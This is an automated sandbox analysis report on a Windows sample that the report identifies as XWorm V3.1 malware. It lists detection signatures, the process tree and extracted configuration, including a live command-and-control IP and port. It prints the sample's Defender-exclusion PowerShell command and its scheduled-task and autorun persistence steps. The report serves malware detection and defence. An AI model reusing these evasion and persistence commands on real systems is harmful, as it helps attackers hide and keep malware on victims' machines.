Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9758xBqgE1azKnB.exe

Overview

General Information

Sample name:9758xBqgE1azKnB.exe
Analysis ID:1562040
MD5:bf7866489443a237806a4d3d5701cdf3
SHA1:ffbe2847590e876892b41585784b40144c224160
SHA256:1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
Tags:exeuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 9758xBqgE1azKnB.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • powershell.exe (PID: 5500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1364 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • 9758xBqgE1azKnB.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
      • WerFault.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • grjujyNaBLaKbU.exe (PID: 888 cmdline: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 7340 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • grjujyNaBLaKbU.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • grjujyNaBLaKbU.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • 9758xBqgE1azKnB.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 7652 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • 9758xBqgE1azKnB.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 8036 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["18.181.154.24"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7772:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x780f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7924:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7420:$cnc4: POST / HTTP/1.1
    00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10416:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x194f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x2370a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x104b3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x19593:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x237a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x105c8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x196a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x238bc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x100c4:$cnc4: POST / HTTP/1.1
      • 0x191a4:$cnc4: POST / HTTP/1.1
      • 0x233b8:$cnc4: POST / HTTP/1.1
      0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x5b72:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x5c0f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5d24:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x5820:$cnc4: POST / HTTP/1.1
          0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x5b72:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x5c0f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5d24:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x5820:$cnc4: POST / HTTP/1.1
            8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 21 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ProcessId: 6912, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe, ParentImage: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe, ParentProcessId: 888, ParentProcessName: grjujyNaBLaKbU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", ProcessId: 7340, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", ProcessId: 1364, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", ProcessId: 1364, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T06:25:13.034497+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:25:43.034632+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:26:13.077926+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:26:43.062445+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:27:13.042930+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:27:43.059424+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:28:13.069282+010028528701Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T06:25:13.034497+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:25:43.034632+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:26:13.077926+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:26:43.062445+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:27:13.042930+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:27:43.059424+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              2024-11-25T06:28:13.069282+010028528741Malware Command and Control Activity Detected18.181.154.247000192.168.2.449735TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T06:26:18.498577+010028531931Malware Command and Control Activity Detected192.168.2.44973518.181.154.247000TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["18.181.154.24"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeVirustotal: Detection: 54%Perma Link
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeVirustotal: Detection: 54%Perma Link
              Multi AV Scanner detection for submitted file
              Source: 9758xBqgE1azKnB.exeReversingLabs: Detection: 57%
              Source: 9758xBqgE1azKnB.exeVirustotal: Detection: 54%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 9758xBqgE1azKnB.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpackString decryptor: 18.181.154.24
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpackString decryptor: 7000
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpackString decryptor: <123456789>
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpackString decryptor: <Xwormmm>
              Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpackString decryptor: USB.exe
              Source: 9758xBqgE1azKnB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 9758xBqgE1azKnB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Windows\NHwE.pdbpdbHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Windows.Forms.pdbH source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.pdbAccessibility.dll8 source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdbu source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Configuration.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: o.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdbSHA256T source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdbj~ source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: %%.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb% source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000156C000.00000004.00000020.00020000.00000000.sdmp, WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdb source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000152A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Drawing.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdb source: WER1BE7.tmp.dmp.28.dr
